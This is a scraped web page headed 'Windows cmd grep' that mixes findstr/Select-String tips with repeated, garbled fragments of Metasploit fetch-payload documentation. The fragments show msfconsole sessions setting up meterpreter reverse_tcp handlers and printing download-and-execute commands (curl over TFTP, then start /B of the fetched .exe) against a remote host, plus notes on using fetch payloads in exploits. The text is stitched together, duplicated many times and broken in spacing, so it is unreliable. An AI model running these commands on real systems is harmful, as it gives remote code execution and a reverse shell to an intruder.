Windows cmd grep
Author: W | 2025-04-24
Windows cmd version of grep The findstr command is a Windows grep equivalent in a Windows command-line prompt (CMD). In a Windows PowerShell the alternative for grep is the Select-String
Windows cmd version of grep
0 10.5.135.201:8080 0.0.0.0:* udp 0 0 10.5.135.201:8080 0.0.0.0:* msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set FETCH_URIPATH test4FETCH_URIPATH => test4msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set LPORT 8547LPORT => 8547msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > to_handler[*] Command to run on remote host: curl -so DOjmRoCOSMn.exe tftp://10.5.135.201:8080/test4 & start /B DOjmRoCOSMn.exe[*] Payload Handler Started as Job 5[*] starting tftpserver on 10.5.135.201:8080[*] Started reverse TCP handler on 10.5.135.201:8547 msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > netstat -an | grep 8080[*] exec: netstat -an | grep 8080udp 0 0 10.5.135.201:8080 0.0.0.0:* udp 0 0 10.5.135.201:8080 0.0.0.0:* udp 0 0 10.5.135.201:8080 0.0.0.0:* ">msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > jobsJobs==== Id Name Payload Payload opts -- ---- ------- ------------ 2 Exploit: multi/handler cmd/windows/tftp/x64/meterpreter/reverse_tcp tcp://10.5.135.201:4444msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set LPORT 4445LPORT => 4445msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > to_handler[*] Command to run on remote host: curl -so plEYxIdBQna.exe tftp://10.5.135.201:8080/test1 & start /B plEYxIdBQna.exe[*] Payload Handler Started as Job 4[*] starting tftpserver on 10.5.135.201:8080[*] Started reverse TCP handler on 10.5.135.201:4445 msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > jobsJobs==== Id Name Payload Payload opts -- ---- ------- ------------ 2 Exploit: multi/handler cmd/windows/tftp/x64/meterpreter/reverse_tcp tcp://10.5.135.201:4444 4 Exploit: multi/handler cmd/windows/tftp/x64/meterpreter/reverse_tcp tcp://10.5.135.201:4445msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > netstat -an | grep 8080[*] exec: netstat -an | grep 8080udp 0 0 10.5.135.201:8080 0.0.0.0:* udp 0 0 10.5.135.201:8080 0.0.0.0:* msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set FETCH_URIPATH test4FETCH_URIPATH => test4msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set LPORT 8547LPORT => 8547msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > to_handler[*] Command to run on remote host: curl -so DOjmRoCOSMn.exe tftp://10.5.135.201:8080/test4 & start /B DOjmRoCOSMn.exe[*] Payload Handler Started as Job 5[*] starting tftpserver on 10.5.135.201:8080[*] Started reverse TCP handler on 10.5.135.201:8547 msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > netstat -an | grep 8080[*] exec: netstat -an | grep 8080udp 0 0 10.5.135.201:8080 0.0.0.0:* udp 0 0 10.5.135.201:8080 0.0.0.0:* udp 0 0 10.5.135.201:8080 0.0.0.0:* There is nothing to stop you from creating a race condition by starting multiple tftp servers with the same IP, port,and FETCH_URI value but serving different payloads. This will result in a race condition where the payload served isnon-deterministic.Windows OnlyCertutilCertutil is a great choice for Windows targets- it is likely to be present on most recent releases of Windows and ishighly configurable. The one troublesome aspect is that there is no insecure mode for Certutil, so if you are usingCertutil with the HTTPS protocol, the certificate must. Windows cmd version of grep The findstr command is a Windows grep equivalent in a Windows command-line prompt (CMD). In a Windows PowerShell the alternative for grep is the Select-String The findstr command is a Windows grep equivalent in a Windows command-line prompt (CMD). In a Windows PowerShell the alternative for grep is the Select-String The findstr command is a Windows grep equivalent in a Windows command-line prompt (CMD). In a Windows PowerShell the alternative for grep is the Select-String Windows Grep Command – Examples and How To Install. In this tutorial, we will learn how to install the grep command on the Windows operating system. We will then look at a few examples to learn how to search for text patterns with the grep command. After you install grep on Windows, you can use it on both CMD and Windows PowerShell. You can pipe CMD and I submitted the following commands through the cmd window on a Windows 11 machine: grep -r -include=.c return grep -r -include= .c return grep -recursive - The type command is a Windows cat equivalent that works across a command-line prompt (CMD) and a Windows PowerShell. The findstr command is a Windows grep equivalent in a Windows command-line prompt (CMD). In a Windows PowerShell the alternative for grep is the Select-String command. The findstr command is a Windows grep equivalent in a Windows command-line prompt (CMD). In a Windows PowerShell the alternative for grep is the Select-String command. Below you will find some examples of how to grep in Windows using these alternatives. Handler on 10.5.135.201:4567 Fetch Handlers and Served Payload HandlersThe Fetch Handler is tracked with the Served Payload Handler, so you will only see the Served Payload Handler underJobs, even though the Fetch Handler is listening: jobs -lJobs==== Id Name Payload Payload opts -- ---- ------- ------------ 0 Exploit: multi/handler cmd/linux/http/x64/meterpreter/reverse_tcp tcp://10.5.135.201:4567msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > netstat -ant | grep 8000[*] exec: netstat -ant | grep 8000tcp 0 0 10.5.135.201:8000 0.0.0.0:* LISTEN ">msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > jobs -lJobs==== Id Name Payload Payload opts -- ---- ------- ------------ 0 Exploit: multi/handler cmd/linux/http/x64/meterpreter/reverse_tcp tcp://10.5.135.201:4567msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > netstat -ant | grep 8000[*] exec: netstat -ant | grep 8000tcp 0 0 10.5.135.201:8000 0.0.0.0:* LISTEN Killing the Served Payload handler will kill the Fetch Handler as well: jobs -k 0[*] Stopping the following job(s): 0[*] Stopping job 0msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > netstat -ant | grep 8000[*] exec: netstat -ant | grep 8000msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > ">msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > jobs -k 0[*] Stopping the following job(s): 0[*] Stopping job 0msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > netstat -ant | grep 8000[*] exec: netstat -ant | grep 8000msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > Using Fetch Payloads on the FlyOne really nice thing about Fetch Payloads is that it gives you the ability to execute a binary payload very quickly,without relying on a session in framework or having to get a payload on target. If you have a shell session or even areally odd situation where you can execute commands, you can get a session in framework quickly without having to uploada payload manually. Just follow the steps above, and run the provided command. Right now, the only thing we serve areFramework payloads, but in the future, expanding to serve and execute any executable binary would be relatively trivial.Using it in an exploitUsing Fetch Payloads is no different than using any other command payload. First, give users access to the Fetchpayloads for a given platform by adding a target that supports ARCH_CMD and the desired platform, either windows orlinux. Once the target has been added, you can get access to the command by invoking payload.encoded and use it asthe command to execute on the remote target.Example paired with CmdStagerThere is likelyComments
0 10.5.135.201:8080 0.0.0.0:* udp 0 0 10.5.135.201:8080 0.0.0.0:* msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set FETCH_URIPATH test4FETCH_URIPATH => test4msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set LPORT 8547LPORT => 8547msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > to_handler[*] Command to run on remote host: curl -so DOjmRoCOSMn.exe tftp://10.5.135.201:8080/test4 & start /B DOjmRoCOSMn.exe[*] Payload Handler Started as Job 5[*] starting tftpserver on 10.5.135.201:8080[*] Started reverse TCP handler on 10.5.135.201:8547 msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > netstat -an | grep 8080[*] exec: netstat -an | grep 8080udp 0 0 10.5.135.201:8080 0.0.0.0:* udp 0 0 10.5.135.201:8080 0.0.0.0:* udp 0 0 10.5.135.201:8080 0.0.0.0:* ">msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > jobsJobs==== Id Name Payload Payload opts -- ---- ------- ------------ 2 Exploit: multi/handler cmd/windows/tftp/x64/meterpreter/reverse_tcp tcp://10.5.135.201:4444msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set LPORT 4445LPORT => 4445msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > to_handler[*] Command to run on remote host: curl -so plEYxIdBQna.exe tftp://10.5.135.201:8080/test1 & start /B plEYxIdBQna.exe[*] Payload Handler Started as Job 4[*] starting tftpserver on 10.5.135.201:8080[*] Started reverse TCP handler on 10.5.135.201:4445 msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > jobsJobs==== Id Name Payload Payload opts -- ---- ------- ------------ 2 Exploit: multi/handler cmd/windows/tftp/x64/meterpreter/reverse_tcp tcp://10.5.135.201:4444 4 Exploit: multi/handler cmd/windows/tftp/x64/meterpreter/reverse_tcp tcp://10.5.135.201:4445msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > netstat -an | grep 8080[*] exec: netstat -an | grep 8080udp 0 0 10.5.135.201:8080 0.0.0.0:* udp 0 0 10.5.135.201:8080 0.0.0.0:* msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set FETCH_URIPATH test4FETCH_URIPATH => test4msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set LPORT 8547LPORT => 8547msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > to_handler[*] Command to run on remote host: curl -so DOjmRoCOSMn.exe tftp://10.5.135.201:8080/test4 & start /B DOjmRoCOSMn.exe[*] Payload Handler Started as Job 5[*] starting tftpserver on 10.5.135.201:8080[*] Started reverse TCP handler on 10.5.135.201:8547 msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > netstat -an | grep 8080[*] exec: netstat -an | grep 8080udp 0 0 10.5.135.201:8080 0.0.0.0:* udp 0 0 10.5.135.201:8080 0.0.0.0:* udp 0 0 10.5.135.201:8080 0.0.0.0:* There is nothing to stop you from creating a race condition by starting multiple tftp servers with the same IP, port,and FETCH_URI value but serving different payloads. This will result in a race condition where the payload served isnon-deterministic.Windows OnlyCertutilCertutil is a great choice for Windows targets- it is likely to be present on most recent releases of Windows and ishighly configurable. The one troublesome aspect is that there is no insecure mode for Certutil, so if you are usingCertutil with the HTTPS protocol, the certificate must
2025-04-18Handler on 10.5.135.201:4567 Fetch Handlers and Served Payload HandlersThe Fetch Handler is tracked with the Served Payload Handler, so you will only see the Served Payload Handler underJobs, even though the Fetch Handler is listening: jobs -lJobs==== Id Name Payload Payload opts -- ---- ------- ------------ 0 Exploit: multi/handler cmd/linux/http/x64/meterpreter/reverse_tcp tcp://10.5.135.201:4567msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > netstat -ant | grep 8000[*] exec: netstat -ant | grep 8000tcp 0 0 10.5.135.201:8000 0.0.0.0:* LISTEN ">msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > jobs -lJobs==== Id Name Payload Payload opts -- ---- ------- ------------ 0 Exploit: multi/handler cmd/linux/http/x64/meterpreter/reverse_tcp tcp://10.5.135.201:4567msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > netstat -ant | grep 8000[*] exec: netstat -ant | grep 8000tcp 0 0 10.5.135.201:8000 0.0.0.0:* LISTEN Killing the Served Payload handler will kill the Fetch Handler as well: jobs -k 0[*] Stopping the following job(s): 0[*] Stopping job 0msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > netstat -ant | grep 8000[*] exec: netstat -ant | grep 8000msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > ">msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > jobs -k 0[*] Stopping the following job(s): 0[*] Stopping job 0msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > netstat -ant | grep 8000[*] exec: netstat -ant | grep 8000msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > Using Fetch Payloads on the FlyOne really nice thing about Fetch Payloads is that it gives you the ability to execute a binary payload very quickly,without relying on a session in framework or having to get a payload on target. If you have a shell session or even areally odd situation where you can execute commands, you can get a session in framework quickly without having to uploada payload manually. Just follow the steps above, and run the provided command. Right now, the only thing we serve areFramework payloads, but in the future, expanding to serve and execute any executable binary would be relatively trivial.Using it in an exploitUsing Fetch Payloads is no different than using any other command payload. First, give users access to the Fetchpayloads for a given platform by adding a target that supports ARCH_CMD and the desired platform, either windows orlinux. Once the target has been added, you can get access to the command by invoking payload.encoded and use it asthe command to execute on the remote target.Example paired with CmdStagerThere is likely
2025-04-20Platforms and the options are verystandardized across releases and platforms. This makes cURL a good default choice for both Linux and Windowstargets. All options and server protocol types are supported by the cURL command.TFTPThe TFTP binary is useful only in edge cases because of a long list of limitations:It is a Windows feature, but it is turned off by default on Windows Vista and later.While you are likely to find it on Linux and Unix hosts, the options are not standard across releases.The TFTP binary included in many Linux systems and all Windows systems does not allow for the port to be configured,nor does it allow for the destination filename to be configured, so FETCH_SRVPORT must always be set to 69 andFETCH_WRITABLE_DIR and FETCH_FILENAME must be empty. Listening on port 69 in Framework can be problematic, so Isuggest that you use the advanced option FetchListenerBindPort to start the server on a different port and redirectthe connection with a tool like iptables to a high port.For example, if you are on a linux host with iptables, you can execute the following commands to redirect a connectionon UDP port 69 to UDP port 3069:sudo iptables -t nat -I PREROUTING -p udp --dport 69 -j REDIRECT --to-ports 3069sudo iptables -t nat -I OUTPUT -p udp -d 127.0.0.1 --dport 69 -j REDIRECT --to-ports 3069Then, you can set FetchListenerBindPort to 3069 and get the callback correctly.Because tftp is a udp-based protocol and because od the implementation of the server within Framework, each time youstart a tftp fetch handler, a new service will start: jobsJobs==== Id Name Payload Payload opts -- ---- ------- ------------ 2 Exploit: multi/handler cmd/windows/tftp/x64/meterpreter/reverse_tcp tcp://10.5.135.201:4444msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set LPORT 4445LPORT => 4445msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > to_handler[*] Command to run on remote host: curl -so plEYxIdBQna.exe tftp://10.5.135.201:8080/test1 & start /B plEYxIdBQna.exe[*] Payload Handler Started as Job 4[*] starting tftpserver on 10.5.135.201:8080[*] Started reverse TCP handler on 10.5.135.201:4445 msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > jobsJobs==== Id Name Payload Payload opts -- ---- ------- ------------ 2 Exploit: multi/handler cmd/windows/tftp/x64/meterpreter/reverse_tcp tcp://10.5.135.201:4444 4 Exploit: multi/handler cmd/windows/tftp/x64/meterpreter/reverse_tcp tcp://10.5.135.201:4445msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > netstat -an | grep 8080[*] exec: netstat -an | grep 8080udp 0
2025-04-06